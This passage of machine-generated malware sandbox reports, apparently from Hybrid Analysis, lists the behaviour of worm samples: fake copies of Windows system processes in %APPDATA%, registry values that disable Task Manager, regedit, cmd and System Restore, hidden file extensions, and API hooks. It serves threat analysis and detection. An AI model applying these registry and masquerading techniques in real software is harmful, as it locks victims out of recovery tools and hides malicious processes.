\"C:\\05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\"\n \"D3_08.exe\" allocated memory in \"%WINDIR%\\D3_08.exe\"\n \"IExplorer.exe\" allocated memory in \"%WINDIR%\\system32\\IExplorer.exe\"\n \"CSRSS.EXE\" allocated memory in \"%APPDATA%\\WINDOWS\\CSRSS.EXE\"\n \"SERVICES.EXE\" allocated memory in \"%APPDATA%\\WINDOWS\\SERVICES.EXE\"\n \"LSASS.EXE\" allocated memory in \"%APPDATA%\\WINDOWS\\LSASS.EXE\"\n \"SMSS.EXE\" allocated memory in \"%APPDATA%\\WINDOWS\\SMSS.EXE\"", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Anti-Detection/Stealthyness", "identifier": "registry-15", "type": 3, "relevance": 5, "name": "Changes file extension appearance of the explorer", "description": "\"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" (Access type: \"CREATE\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\ADVANCED\\\")\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\ADVANCED\"; Key: \"HIDEFILEEXT\"; Value: \"01000000\")\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\ADVANCED\"; Key: \"HIDDEN\"; Value: \"00000000\")\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\ADVANCED\"; Key: \"SHOWSUPERHIDDEN\"; Value: \"00000000\")\n \"D3_08.exe\" (Access type: \"CREATE\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\ADVANCED\\\")\n \"D3_08.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\ADVANCED\"; Key: \"HIDEFILEEXT\"; Value: \"01000000\")\n \"D3_08.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\ADVANCED\"; Key: \"HIDDEN\"; Value: \"00000000\")\n \"D3_08.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\ADVANCED\"; Key: \"SHOWSUPERHIDDEN\"; Value: \"00000000\")\n \"IExplorer.exe\" (Access type: \"CREATE\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\ADVANCED\\\")\n \"IExplorer.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\ADVANCED\"; Key: \"HIDEFILEEXT\"; Value: \"01000000\")\n \"IExplorer.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\ADVANCED\"; Key: \"HIDDEN\"; Value: \"00000000\")\n \"IExplorer.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\ADVANCED\"; Key: \"SHOWSUPERHIDDEN\"; Value: \"00000000\")\n \"WINLOGON.EXE\" (Access type: \"CREATE\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\ADVANCED\\\")\n \"WINLOGON.EXE\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\ADVANCED\"; Key: \"HIDEFILEEXT\"; Value: \"01000000\")\n \"WINLOGON.EXE\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\ADVANCED\"; Key: \"HIDDEN\"; Value: \"00000000\")\n \"WINLOGON.EXE\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\ADVANCED\"; Key: \"SHOWSUPERHIDDEN\"; Value: \"00000000\")\n \"SERVICES.EXE\" (Access type: \"CREATE\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\ADVANCED\\\")\n \"SERVICES.EXE\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\ADVANCED\"; Key: \"HIDEFILEEXT\"; Value: \"01000000\")\n \"SERVICES.EXE\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\ADVANCED\"; Key: \"HIDDEN\"; Value: \"00000000\")\n \"SERVICES.EXE\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\ADVANCED\"; Key: \"SHOWSUPERHIDDEN\"; Value: \"00000000\")\n \"LSASS.EXE\" (Access type: \"CREATE\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\ADVANCED\\\")\n \"LSASS.EXE\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\ADVANCED\"; Key: \"HIDEFILEEXT\"; Value: \"01000000\")\n \"LSASS.EXE\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\ADVANCED\"; Key: \"HIDDEN\"; Value: \"00000000\")\n \"LSASS.EXE\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\ADVANCED\"; Key: \"SHOWSUPERHIDDEN\"; Value: \"00000000\")", "origin": "Registry Access", "attck_id": "T1546.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/001"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Anti-Detection/Stealthyness", "identifier": "target-33", "type": 9, "relevance": 10, "name": "Creates a fake system process", "description": "Process \"WINLOGON.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" (UID: 00000000-00005040)\n Process \"WINLOGON.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" (UID: 00000000-00005084)\n Process \"CSRSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" (UID: 00000000-00004612)\n Process \"CSRSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" (UID: 00000000-00002756)\n Process \"SERVICES.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" (UID: 00000000-00000944)\n Process \"SERVICES.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" (UID: 00000000-00005216)\n Process \"WINLOGON.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" (UID: 00000000-00005052)\n Process \"LSASS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\LSASS.EXE\" (UID: 00000000-00005116)\n Process \"CSRSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" (UID: 00000000-00004768)\n Process \"LSASS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\LSASS.EXE\" (UID: 00000000-00004716)\n Process \"WINLOGON.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" (UID: 00000000-00001340)\n Process \"SERVICES.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" (UID: 00000000-00002904)\n Process \"CSRSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" (UID: 00000000-00004120)\n Process \"SMSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SMSS.EXE\" (UID: 00000000-00003492)\n Process \"SMSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SMSS.EXE\" (UID: 00000000-00005136)\n Process \"LSASS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\LSASS.EXE\" (UID: 00000000-00005404)\n Process \"SERVICES.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" (UID: 00000000-00003420)\n Process \"LSASS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\LSASS.EXE\" (UID: 00000000-00005412)\n Process \"SMSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SMSS.EXE\" (UID: 00000000-00005296)\n Process \"WINLOGON.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" (UID: 00000000-00003288)\n Process \"SMSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SMSS.EXE\" (UID: 00000000-00005548)\n Process \"CSRSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" (UID: 00000000-00005132)\n Process \"WINLOGON.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" (UID: 00000000-00005868)\n Process \"SERVICES.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" (UID: 00000000-00005940)\n Process \"WINLOGON.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" (UID: 00000000-00005932)\n Process \"CSRSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" (UID: 00000000-00004276)\n Process \"CSRSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" (UID: 00000000-00006036)\n Process \"SERVICES.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" (UID: 00000000-00001644)\n Process \"LSASS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\LSASS.EXE\" (UID: 00000000-00004312)\n Process \"SERVICES.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" (UID: 00000000-00006056)\n Process \"LSASS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\LSASS.EXE\" (UID: 00000000-00005772)\n Process \"WINLOGON.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" (UID: 00000000-00002100)\n Process \"LSASS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\LSASS.EXE\" (UID: 00000000-00004272)\n Process \"SMSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SMSS.EXE\" (UID: 00000000-00005992)\n Process \"SMSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SMSS.EXE\" (UID: 00000000-00006092)\n Process \"SMSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SMSS.EXE\" (UID: 00000000-00005988)\n Process \"CSRSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" (UID: 00000000-00003432)\n Process \"SERVICES.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" (UID: 00000000-00005808)\n Process \"WINLOGON.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" (UID: 00000000-00001904)\n Process \"WINLOGON.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" (UID: 00000000-00002232)\n Process \"CSRSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" (UID: 00000000-00005760)", "origin": "Monitored Target", "attck_id": "T1036.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036/005"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Anti-Detection/Stealthyness", "identifier": "hooks-2", "type": 11, "relevance": 10, "name": "Hooks file system APIs", "description": "\"FindNextFileA@KERNEL32.DLL\" in \"D3_08.exe\"\n \"FindFirstFileA@KERNEL32.DLL\" in \"D3_08.exe\"\n \"FindNextFileW@KERNEL32.DLL\" in \"D3_08.exe\"\n \"FindFirstFileW@KERNEL32.DLL\" in \"D3_08.exe\"\n \"FindNextFileA@KERNEL32.DLL\" in \"SERVICES.EXE\"\n \"FindFirstFileA@KERNEL32.DLL\" in \"SERVICES.EXE\"\n \"FindNextFileW@KERNEL32.DLL\" in \"SERVICES.EXE\"\n \"FindFirstFileW@KERNEL32.DLL\" in \"SERVICES.EXE\"\n \"FindNextFileA@KERNEL32.DLL\" in \"IExplorer.exe\"\n \"FindFirstFileA@KERNEL32.DLL\" in \"IExplorer.exe\"\n \"FindNextFileW@KERNEL32.DLL\" in \"IExplorer.exe\"\n \"FindFirstFileW@KERNEL32.DLL\" in \"IExplorer.exe\"\n \"FindNextFileA@KERNEL32.DLL\" in \"SMSS.EXE\"\n \"FindFirstFileA@KERNEL32.DLL\" in \"SMSS.EXE\"\n \"FindNextFileW@KERNEL32.DLL\" in \"SMSS.EXE\"\n \"FindFirstFileW@KERNEL32.DLL\" in \"SMSS.EXE\"\n \"FindNextFileA@KERNEL32.DLL\" in \"LSASS.EXE\"\n \"FindFirstFileA@KERNEL32.DLL\" in \"LSASS.EXE\"\n \"FindNextFileW@KERNEL32.DLL\" in \"LSASS.EXE\"\n \"FindFirstFileW@KERNEL32.DLL\" in \"LSASS.EXE\"", "origin": "Hook Detection", "attck_id": "T1056.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/004"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Spyware/Information Retrieval", "identifier": "hooks-5", "type": 11, "relevance": 10, "name": "Hooks internet related APIs", "description": "\"send@WS2_32.DLL\" in \"D3_08.exe\"\n \"send@WS2_32.DLL\" in \"SERVICES.EXE\"\n \"send@WS2_32.DLL\" in \"IExplorer.exe\"\n \"send@WS2_32.DLL\" in \"SMSS.EXE\"\n \"send@WS2_32.DLL\" in \"LSASS.EXE\"", "origin": "Hook Detection", "attck_id": "T1056.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/004"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Ransomware/Banking", "identifier": "registry-21", "type": 3, "relevance": 6, "name": "Disables Command Prompt (cmd)", "description": "\"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" (Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SYSTEM\"; Key: \"DISABLECMD\"; Value: \"01000000\")\n \"D3_08.exe\" (Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SYSTEM\"; Key: \"DISABLECMD\"; Value: \"01000000\")\n \"IExplorer.exe\" (Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SYSTEM\"; Key: \"DISABLECMD\"; Value: \"01000000\")\n \"WINLOGON.EXE\" (Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SYSTEM\"; Key: \"DISABLECMD\"; Value: \"01000000\")\n \"SERVICES.EXE\" (Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SYSTEM\"; Key: \"DISABLECMD\"; Value: \"01000000\")\n \"LSASS.EXE\" (Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SYSTEM\"; Key: \"DISABLECMD\"; Value: \"01000000\")", "origin": "Registry Access", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Ransomware/Banking", "identifier": "registry-3", "type": 3, "relevance": 9, "name": "Disables Windows Task Manager (taskmgr)", "description": "\"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\SYSTEM\"; Key: \"DISABLETASKMGR\"; Value: \"01000000\")\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\SYSTEM\"; Key: \"DISABLETASKMGR\"; Value: \"01000000\")\n \"D3_08.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\SYSTEM\"; Key: \"DISABLETASKMGR\"; Value: \"01000000\")\n \"D3_08.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\SYSTEM\"; Key: \"DISABLETASKMGR\"; Value: \"01000000\")\n \"IExplorer.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\SYSTEM\"; Key: \"DISABLETASKMGR\"; Value: \"01000000\")\n \"IExplorer.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\SYSTEM\"; Key: \"DISABLETASKMGR\"; Value: \"01000000\")\n \"WINLOGON.EXE\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\SYSTEM\"; Key: \"DISABLETASKMGR\"; Value: \"01000000\")\n \"WINLOGON.EXE\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\SYSTEM\"; Key: \"DISABLETASKMGR\"; Value: \"01000000\")\n \"SERVICES.EXE\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\SYSTEM\"; Key: \"DISABLETASKMGR\"; Value: \"01000000\")\n \"SERVICES.EXE\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\SYSTEM\"; Key: \"DISABLETASKMGR\"; Value: \"01000000\")\n \"LSASS.EXE\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\SYSTEM\"; Key: \"DISABLETASKMGR\"; Value: \"01000000\")\n \"LSASS.EXE\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\SYSTEM\"; Key: \"DISABLETASKMGR\"; Value: \"01000000\")", "origin": "Registry Access", "attck_id": "T1562.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/001"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Ransomware/Banking", "identifier": "registry-2", "type": 3, "relevance": 9, "name": "Disables Windows Registry Editor (regedit)", "description": "\"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\SYSTEM\"; Key: \"DISABLEREGISTRYTOOLS\"; Value: \"01000000\")\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\SYSTEM\"; Key: \"DISABLEREGISTRYTOOLS\"; Value: \"01000000\")\n \"D3_08.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\SYSTEM\"; Key: \"DISABLEREGISTRYTOOLS\"; Value: \"01000000\")\n \"D3_08.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\SYSTEM\"; Key: \"DISABLEREGISTRYTOOLS\"; Value: \"01000000\")\n \"IExplorer.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\SYSTEM\"; Key: \"DISABLEREGISTRYTOOLS\"; Value: \"01000000\")\n \"IExplorer.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\SYSTEM\"; Key: \"DISABLEREGISTRYTOOLS\"; Value: \"01000000\")\n \"WINLOGON.EXE\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\SYSTEM\"; Key: \"DISABLEREGISTRYTOOLS\"; Value: \"01000000\")\n \"WINLOGON.EXE\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\SYSTEM\"; Key: \"DISABLEREGISTRYTOOLS\"; Value: \"01000000\")\n \"SERVICES.EXE\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\SYSTEM\"; Key: \"DISABLEREGISTRYTOOLS\"; Value: \"01000000\")\n \"SERVICES.EXE\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\SYSTEM\"; Key: \"DISABLEREGISTRYTOOLS\"; Value: \"01000000\")\n \"LSASS.EXE\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\SYSTEM\"; Key: \"DISABLEREGISTRYTOOLS\"; Value: \"01000000\")\n \"LSASS.EXE\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\SYSTEM\"; Key: \"DISABLEREGISTRYTOOLS\"; Value: \"01000000\")", "origin": "Registry Access", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "System Destruction", "identifier": "registry-23", "type": 3, "relevance": 9, "name": "Disables system restore", "description": "\"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS NT\\SYSTEMRESTORE\"; Key: \"DISABLECONFIG\"; Value: \"01000000\")\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS NT\\SYSTEMRESTORE\"; Key: \"DISABLESR\"; Value: \"01000000\")\n \"D3_08.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS NT\\SYSTEMRESTORE\"; Key: \"DISABLECONFIG\"; Value: \"01000000\")\n \"D3_08.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS NT\\SYSTEMRESTORE\"; Key: \"DISABLESR\"; Value: \"01000000\")\n \"IExplorer.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS NT\\SYSTEMRESTORE\"; Key: \"DISABLECONFIG\"; Value: \"01000000\")\n \"IExplorer.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS NT\\SYSTEMRESTORE\"; Key: \"DISABLESR\"; Value: \"01000000\")\n \"WINLOGON.EXE\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS NT\\SYSTEMRESTORE\"; Key: \"DISABLECONFIG\"; Value: \"01000000\")\n \"WINLOGON.EXE\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS NT\\SYSTEMRESTORE\"; Key: \"DISABLESR\"; Value: \"01000000\")\n \"SERVICES.EXE\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS NT\\SYSTEMRESTORE\"; Key: \"DISABLECONFIG\"; Value: \"01000000\")\n \"SERVICES.EXE\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS NT\\SYSTEMRESTORE\"; Key: \"DISABLESR\"; Value: \"01000000\")\n \"LSASS.EXE\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS NT\\SYSTEMRESTORE\"; Key: \"DISABLECONFIG\"; Value: \"01000000\")\n \"LSASS.EXE\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS NT\\SYSTEMRESTORE\"; Key: \"DISABLESR\"; Value: \"01000000\")", "origin": "Registry Access", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "avtest-8", "type": 12, "relevance": 10, "name": "Sample detected by CrowdStrike Static Analysis and ML with relatively high confidence", "description": "CrowdStrike Static Analysis and ML (QuickScan) yielded detection: win/malicious_confidence_100% (W)", "origin": "External System"}]}
cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033
https://hybrid-analysis.com/sample/cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033
Hybrid Analysis - Killers
{"size": 167965, "type": "PE32 executable (GUI) Intel 80386, for MS Windows", "submit_name": "cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033", "sha256": "cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033", "av_detect": 94, "vx_family": "Worm.Ludbaruma", "threat_score": 85, "threat_level": 2, "verdict": "malicious", "certificates_validation_message": "No signature was present in the subject. (0x800b0100)", "total_processes": 8, "total_signatures": 174, "extracted_files": [{"name": "Empty.pif", "file_path": "%ALLUSERSPROFILE%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif", "file_size": 167965, "sha256": "417f3745c814e476c8e2c65c65f82046cb522e8d89f922eb51929524391e7233", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe (PID: 5328)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "CSRSS.EXE", "file_path": "%LOCALAPPDATA%\\WINDOWS\\CSRSS.EXE", "file_size": 167965, "sha256": "a7685fa2f5b3adfc9ed1cefd39d53074d48b9639d415f51d8c8207bc08b0b073", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe (PID: 5328)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "LSASS.EXE", "file_path": "%LOCALAPPDATA%\\WINDOWS\\LSASS.EXE", "file_size": 167965, "sha256": "8cb57c624d6f656ef87cec9740a5d8325c7e8175d4f1ae81a1f7e46037aad355", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe (PID: 5328)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "SERVICES.EXE", "file_path": "%LOCALAPPDATA%\\WINDOWS\\SERVICES.EXE", "file_size": 167965, "sha256": "184e4ccf531c3d2d3b614720fb0d3e7f2ef45a764a07d316f13e84b066a020a5", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe (PID: 5328)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "SMSS.EXE", "file_path": "%LOCALAPPDATA%\\WINDOWS\\SMSS.EXE", "file_size": 167965, "sha256": "0380022a10f4bb4fd5804ffd53b3053da22fb73a6f123561b4ee632a3d93beee", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe (PID: 5328)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "WINLOGON.EXE", "file_path": "%LOCALAPPDATA%\\WINDOWS\\WINLOGON.EXE", "file_size": 167965, "sha256": "72eccd5f3b25bd73285f218f3eec7580ac6e2448084e0f7f8c7d8405305f4825", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe (PID: 5328)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "IExplorer.exe", "file_path": "%WINDIR%\\System32\\IExplorer.exe", "file_size": 167965, "sha256": 